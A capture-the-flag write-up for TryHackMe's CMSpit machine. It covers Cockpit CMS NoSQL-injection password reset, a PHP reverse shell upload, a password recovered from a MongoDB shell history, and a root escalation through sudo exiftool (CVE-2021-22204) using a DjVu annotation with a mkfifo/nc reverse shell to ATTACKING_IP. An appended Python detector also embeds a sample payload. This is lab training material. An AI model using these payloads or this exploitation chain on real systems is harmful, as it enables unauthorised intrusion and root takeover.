CMSpit on Tryhackme.com
This is a writeup for the machine CMSpit on Tryhackme.com
First we start off with a full-port nmap scan with default scripts and version detection: nmap -sC -sV -vv -p- IP
Scanned at 2021-08-04 01:10:31 EDT for 1523s
Not shown: 65533 closed ports
Reason: 65533 resets
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 61 OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 7f:25:f9:40:23:25:cd:29:8b:28:a9:d9:82:f5:49:e4 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQD7acH8krj6oVh6s+R3VYnJ/Xc8o5b43RcrRwiMPKe7V8V/SLfeVeHtE06j0PnfF5bHbNjtLP8pMq2USPivt/LcsS+8e+F5yfFFAVawOWqtd9tnrXVQhmyLZVb+wzmjKe+BaNWSnEazjIevMjD3bR8YBYKnf2BoaFKxGkJKPyleMT1GAkU+r47m2FsMa+l7p79VIYrZfss3NTlRq9k6pGsshiJnnzpWmT1KDjI90fGT6oIkALZdW/++qXi+px6+bWDMiW9NVv0eQmN9eTwsFNoWE3JDG7Aeq7hacqF7JyoMPegQwAAHI/ZD66f4zQzqQN6Ou6+sr7IMkC62rLMjKkXN
| 256 0a:f4:29:ed:55:43:19:e7:73:a7:09:79:30:a8:49:1b (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBEnbbSTSHNXi6AcEtMnOG+srCrE2U4lbRXkBxlQMk1damlhG+U0tmiObRCoasyBY2kvAdU/b7ZWoE0AmoYUldvk=
| 256 2f:43:ad:a3:d1:5b:64:86:33:07:5d:94:f9:dc:a4:01 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKYUS/4ObKPMEyPGlgqg6khm41SWn61X9kGbNvyBJh7e
80/tcp open http syn-ack ttl 61 Apache httpd 2.4.18 ((Ubuntu))
|_http-favicon: Unknown favicon MD5: C9CD46C6A2F5C65855276A03FE703735
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-title: Authenticate Please!
|_Requested resource was /auth/login?to=/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 01:35
Completed NSE at 01:35, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 01:35
Completed NSE at 01:35, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 01:35
Completed NSE at 01:35, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1523.45 seconds
Raw packets sent: 71016 (3.125MB) | Rcvd: 67410 (2.736MB)
When we visit the host in a browser we are redirected to a login page (nmap already told us the requested resource was /auth/login?to=/).

If we look at the page source we can see a possible version number, 0.11.1, which identifies the application as Cockpit CMS.

Now that we have a possible version number of 0.11.1, we search for known vulnerabilities in Cockpit 0.11.1. It is vulnerable to NoSQL injection in its authentication endpoints, which lets an unauthenticated attacker enumerate user accounts and reset their passwords; the writeup below explains the bug in detail.
https://swarm.ptsecurity.com/rce-cockpit-cms/
There is a Metasploit module that automates the user enumeration and password reset, so we will start with that.
https://www.rapid7.com/db/modules/exploit/multi/http/cockpit_cms_rce/

After we set our options in Metasploit we can run it. I set the user to admin, since most sites have an admin account; if that guess is wrong, the user list the module dumps tells you which name to target instead.

After running the exploit we get information on the admin user, and the module resets the account's password to a value it chooses.

Now that we have possible credentials, let's try to log in with them.
We log in with admin@yourdomain.de as the username and nZGYcvTF29 as the password.
After clicking the logo in the top left we get to a new dashboard.

Next we will upload a reverse shell.

Let's upload a PHP reverse shell. I use the one shipped on my attacking machine at /usr/share/webshells/php/php-reverse-shell.php, editing its IP and port first. I set the connect-back port to 80 since that is a port the target is very likely allowed to reach outbound. Before triggering the shell, set up a listener on port 80 with nc -nlvp 80.
The file uploads successfully. Clicking on it opens a detail page, and clicking the "link" icon there requests the PHP file directly, which runs it and gives us our shell.

We now have our reverse shell.

Now we navigate to /home to see which users exist. There is a user named stux. Listing everything in their home folder with ls -la reveals a file called .dbshell, which is the MongoDB shell's command history. Running cat on it shows a database command that contains a password for stux.

Now that we have credentials, let's try to SSH in with them; the password from the shell history is reused for the stux system account.

After logging in as stux we check whether the user can run anything with sudo using sudo -l, and we can run exiftool with sudo rights.

Let's research how this binary can be exploited. exploit-db hosts a paper on the ExifTool DjVu annotation bug (CVE-2021-22204): a crafted ANTa annotation in a DjVu file leads to arbitrary code execution when ExifTool parses it, and because we can run exiftool as root, the code runs as root.
https://www.exploit-db.com/docs/49881
First we create a file in nano called exploit containing the annotation below. Replace ATTACKING_IP with your attacking machine's address; the command inside system() is the same mkfifo/nc reverse shell pattern, connecting back on port 80.
(metadata "\c${system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc ATTACKING_IP 80 >/tmp/f')};")
Next we wrap that annotation in a DjVu container with djvumake (from the djvulibre-bin package) so that ExifTool parses it as an ANTa chunk:
djvumake exploit.djvu INFO=0,0 BGjp=/dev/null ANTa=exploit
Set up a listener on port 80 on your attacking machine before running the exploit (if the earlier listener from the PHP shell is still bound to port 80, stop it first):
nc -nlvp 80
Execute the exploit; since exiftool runs under sudo, the shell that connects back is a root shell:
sudo exiftool exploit.djvu
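Not part of the original writeup: an added Python example of the check a defender would run against this step, a small DjVu chunk parser that flags the \c${...} escape inside ANTa annotations, which is the construct ExifTool evaluated. It builds its own sample files in the layout djvumake produces for INFO/BGjp/ANTa, so it runs offline; the INFO field values, the two annotations and ATTACKING_IP are constructed placeholders, and ANTz (compressed) annotations are reported rather than decoded.

```python
"""Flag DjVu files whose ANTa annotation carries the \\c${...} escape that
ExifTool's DjVu parser handed to Perl eval (CVE-2021-22204).

Added example, not part of the writeup. make_djvu() mimics the structure
djvumake produces for 'INFO=0,0 BGjp=/dev/null ANTa=<file>'; INFO field
values and the sample annotations are constructed placeholders."""
import re
import struct

# Constructed annotations (ATTACKING_IP is a placeholder, as in the writeup).
MALICIOUS_ANT = b'(metadata "\\c${system(\'nc ATTACKING_IP 80\')};")'
BENIGN_ANT = b'(metadata (Author "someone") (Title "quarterly report"))'

# The escape ExifTool expanded with eval: literal backslash, 'c', '$', '{'.
INJECTION = re.compile(rb"\\c\$\{")


def iff_chunk(cid, data):
    """One IFF chunk: 4-byte id, 4-byte big-endian length, data, padded to even length."""
    assert len(cid) == 4
    return cid + struct.pack(">I", len(data)) + data + (b"\x00" if len(data) % 2 else b"")


def make_djvu(ant):
    """Build a minimal single-page DjVu: INFO, an empty BGjp, and an ANTa annotation chunk."""
    # INFO: width, height, minor, major, dpi, gamma, flags (10 bytes; values are placeholders)
    info = struct.pack(">HHBBHBB", 0, 0, 26, 0, 300, 22, 0)
    payload = (b"DJVU" + iff_chunk(b"INFO", info) + iff_chunk(b"BGjp", b"")
               + iff_chunk(b"ANTa", ant))
    return b"AT&T" + b"FORM" + struct.pack(">I", len(payload)) + payload


def iter_chunks(blob):
    """Yield (chunk id, data) for each top-level chunk of a single-page DjVu file."""
    if blob[:4] != b"AT&T" or blob[4:8] != b"FORM":
        raise ValueError("not a DjVu file")
    form_len = struct.unpack(">I", blob[8:12])[0]
    if blob[12:16] != b"DJVU":
        raise ValueError("only single-page DJVU forms are handled here (not DJVM bundles)")
    pos, end = 16, 12 + form_len
    while pos + 8 <= end:
        cid = blob[pos:pos + 4]
        length = struct.unpack(">I", blob[pos + 4:pos + 8])[0]
        data = blob[pos + 8:pos + 8 + length]
        if len(data) != length:
            raise ValueError("truncated chunk %r" % cid)
        yield cid, data
        pos += 8 + length + (length & 1)  # skip the pad byte after odd-length data


def find_ant_injection(blob):
    """Return a list of findings for the file; an empty list means nothing suspicious was seen."""
    findings = []
    for cid, data in iter_chunks(blob):
        if cid == b"ANTa" and INJECTION.search(data):
            findings.append("ANTa annotation contains \\c${...}: %r" % data[:80])
        elif cid == b"ANTz":
            # ANTz carries the same annotation BZZ-compressed. This scanner does not
            # decompress it, so it is reported for manual review, not declared clean.
            findings.append("ANTz chunk present (compressed annotation, not inspected)")
    return findings


if __name__ == "__main__":
    for name, ant in (("benign", BENIGN_ANT), ("malicious", MALICIOUS_ANT)):
        print(name, find_ant_injection(make_djvu(ant)) or "clean")
```

Point find_ant_injection() at the bytes of any exploit.djvu built as above and it reports the ANTa chunk; the parser deliberately refuses multi-page DJVM bundles and truncated chunks instead of silently returning "clean".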